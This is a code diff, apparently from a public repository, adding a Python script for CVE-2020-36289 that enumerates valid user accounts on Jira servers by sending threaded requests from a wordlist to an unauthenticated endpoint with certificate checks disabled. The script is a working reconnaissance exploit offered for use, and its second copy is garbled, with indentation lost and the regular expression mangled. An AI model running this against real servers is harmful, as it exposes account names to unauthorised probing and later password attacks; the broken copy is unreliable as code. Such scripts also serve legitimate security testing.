milo2012 · August 6, 2024 03:43
diff --git a/CVE-2020-36289.py b/CVE-2020-36289.py
 import requests
 import argparse
 import re
 from concurrent.futures import ThreadPoolExecutor, as_completed
 from requests.packages.urllib3.exceptions import InsecureRequestWarning
 requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
 requests.packages.urllib3.disable_warnings()


 def check_usernames(file_path, base_url, num_threads):
    url_template = f"{base_url}/secure/QueryComponentRendererValue!Default.jspa?assignee=user:{{}}"

    # Read the file containing usernames
    with open(file_path, 'r') as file:
        usernames = file.read().splitlines()

    def fetch_username(username):
        url = url_template.format(username)
        try:
            response = requests.get(url, verify=False)  # Suppress SSL verification warning
            if response.status_code == 200:
                parsed_username = extract_username(response.text)
                if parsed_username:
                    print(f"Found username: '{username}': {parsed_username}")
        except requests.RequestException:
            pass

    # Use ThreadPoolExecutor to run fetch_username in parallel
    with ThreadPoolExecutor(max_workers=num_threads) as executor:
        futures = [executor.submit(fetch_username, username) for username in usernames]
        for future in as_completed(futures):
            pass  # Optionally handle the result if needed

 def extract_username(html_text):
    match = re.search(r'<a class=\\"user-hover\\"[^>]*>(.*?)</a>', html_text)
    if match:
        return match.group(1).strip()
    return "Username not found"

 if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Check usernames against a specific URL.")
    parser.add_argument("file", help="Path to the file containing usernames")
    parser.add_argument("-u", "--url", required=True, help="Base URL to query against (e.g., https://127.0.0.1:8444)")
    parser.add_argument("-n", "--threads", type=int, default=4, help="Number of threads to use (default: 4)")

    args = parser.parse_args()
    check_usernames(args.file, args.url, args.threads)
	import requests
	import argparse
	import re
	from concurrent.futures import ThreadPoolExecutor, as_completed
	from requests.packages.urllib3.exceptions import InsecureRequestWarning
	requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
	requests.packages.urllib3.disable_warnings()


	def check_usernames(file_path, base_url, num_threads):
	url_template = f"{base_url}/secure/QueryComponentRendererValue!Default.jspa?assignee=user:{{}}"

	# Read the file containing usernames
	with open(file_path, 'r') as file:
	usernames = file.read().splitlines()

	def fetch_username(username):
	url = url_template.format(username)
	try:
	response = requests.get(url, verify=False) # Suppress SSL verification warning
	if response.status_code == 200:
	parsed_username = extract_username(response.text)
	if parsed_username:
	print(f"Found username: '{username}': {parsed_username}")
	except requests.RequestException:
	pass

	# Use ThreadPoolExecutor to run fetch_username in parallel
	with ThreadPoolExecutor(max_workers=num_threads) as executor:
	futures = [executor.submit(fetch_username, username) for username in usernames]
	for future in as_completed(futures):
	pass # Optionally handle the result if needed

	def extract_username(html_text):
	match = re.search(r'<a class=\\"user-hover\\"[^>]>(.?)</a>', html_text)
	if match:
	return match.group(1).strip()
	return "Username not found"

	if __name__ == "__main__":
	parser = argparse.ArgumentParser(description="Check usernames against a specific URL.")
	parser.add_argument("file", help="Path to the file containing usernames")
	parser.add_argument("-u", "--url", required=True, help="Base URL to query against (e.g., https://127.0.0.1:8444)")
	parser.add_argument("-n", "--threads", type=int, default=4, help="Number of threads to use (default: 4)")

	args = parser.parse_args()
	check_usernames(args.file, args.url, args.threads)